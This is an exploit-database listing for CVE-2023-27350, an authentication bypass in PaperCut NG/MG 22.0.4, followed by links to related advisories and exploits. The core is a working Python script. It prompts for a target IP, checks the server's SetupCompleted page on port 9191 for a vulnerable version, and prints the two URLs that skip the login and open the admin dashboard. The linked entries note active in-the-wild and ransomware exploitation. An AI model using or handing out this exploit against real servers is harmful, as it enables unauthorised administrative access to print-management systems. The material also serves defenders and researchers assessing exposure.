Lucene search
MaanVaderPACKETSTORM:172022HistoryApr 26, 2023 - 12:00 a.m.
PaperCut NG/MG 22.0.4 Authentication Bypass
2023-04-2600:00:00
MaanVader
packetstormsecurity.com
237
0.392 Low
EPSS
Percentile
96.7%
`# Exploit Title: PaperCut NG/MG 22.0.4 - Authentication Bypass
# Date: 21 April 2023
# Exploit Author: MaanVader
# Vendor Homepage: https://www.papercut.com/
# Version: 8.0 or later
# Tested on: 22.0.4
# CVE: CVE-2023-27350
import requests
from bs4 import BeautifulSoup
import re
def vuln_version():
ip = input("Enter the ip address: ")
url = "http://"+ip+":9191"+"/app?service=page/SetupCompleted"
response = requests.get(url)
soup = BeautifulSoup(response.text, 'html.parser')
text_div = soup.find('div', class_='text')
product_span = text_div.find('span', class_='product')
# Search for the first span element containing a version number
version_span = None
for span in text_div.find_all('span'):
version_match = re.match(r'^\d+\.\d+\.\d+$', span.text.strip())
if version_match:
version_span = span
break
if version_span is None:
print('Not Vulnerable')
else:
version_str = version_span.text.strip()
print('Version:', version_str)
print("Vulnerable version")
print(f"Step 1 visit this url first in your browser: {url}")
print(f"Step 2 visit this url in your browser to bypass the login page : http://{ip}:9191/app?service=page/Dashboard")
if __name__ =="__main__":
vuln_version()
`
Related
packetstorm
packetstorm
PaperCut PaperCutNG Authentication Bypass
2023-06-07 00:00:00
PaperCut NG/MG 22.0.4 Remote Code Execution
2023-05-24 00:00:00
githubexploit
githubexploit
Exploit for Improper Access Control in Papercut Papercut Mf
2023-05-27 11:32:35
Exploit for Improper Access Control in Papercut Papercut Mf
2023-04-21 09:19:13
Exploit for Improper Access Control in Papercut Papercut Ng
2023-08-04 08:18:48
talosblog
talosblog
trendmicroblog
trendmicroblog
Update Now: PaperCut Vulnerability CVE-2023-27350 Under Active Exploitation
2023-04-26 00:00:00
zdi
zdi
zdt
zdt
PaperCut PaperCutNG Authentication Bypass Exploit
2023-06-07 00:00:00
PaperCut NG/MG 22.0.4 - Remote Code Execution Exploit
2023-05-23 00:00:00
PaperCut NG/MG 22.0.4 - Authentication Bypass Exploit
2023-04-25 00:00:00
cve
cve
CVE-2023-27350
2023-04-20 16:15:07
prion
prion
Authentication flaw
2023-04-20 16:15:00
thn
thn
nessus
nessus
PaperCut MF Authentication Bypass (CVE-2023-27350)
2023-05-18 00:00:00
PaperCut NG Authentication Bypass (CVE-2023-27350)
2023-04-25 00:00:00
saint
saint
PaperCut authentication bypass
2023-05-12 00:00:00
PaperCut authentication bypass
2023-05-12 00:00:00
metasploit
metasploit
PaperCut PaperCutNG Authentication Bypass
2023-04-25 23:00:33
ics
ics
Malicious Actors Exploit CVE-2023-27350 in PaperCut MF and NG
2023-05-11 12:00:00
Understanding Ransomware Threat Actors: LockBit
2023-06-14 12:00:00
cisa_kev
cisa_kev
PaperCut MF/NG Improper Access Control Vulnerability
2023-04-21 00:00:00
nuclei
nuclei
PaperCut - Unauthenticated Remote Code Execution
2023-04-25 14:03:38
exploitdb
exploitdb
PaperCut NG/MG 22.0.4 - Authentication Bypass
2023-04-25 00:00:00
PaperCut NG/MG 22.0.4 - Remote Code Execution (RCE)
2023-05-23 00:00:00
malwarebytes
malwarebytes
Ransomware review: May 2023
2023-05-08 13:45:00
Update your PaperCut application servers now: Exploits in the wild
2023-04-26 04:00:00
rapid7blog
rapid7blog
CVE-2023-27350: Ongoing Exploitation of PaperCut Remote Code Execution Vulnerability
2023-05-17 18:35:01
Metasploit Weekly Wrap-Up
2023-06-09 22:02:27
Whatβs New in InsightVM and Nexpose: Q2 2023 in Review
2023-06-29 13:00:00
attackerkb
attackerkb
CVE-2023-27350
2023-04-20 00:00:00
qualysblog
qualysblog
Qualys Survey of Top 10 Exploited Vulnerabilities in 2023
2023-09-26 13:04:00
2023 Threat Landscape Year in Review: If Everything Is Critical, Nothing Is
2023-12-19 15:00:00
securelist
securelist
IT threat evolution in Q2 2023. Non-mobile statistics
2023-08-30 10:00:41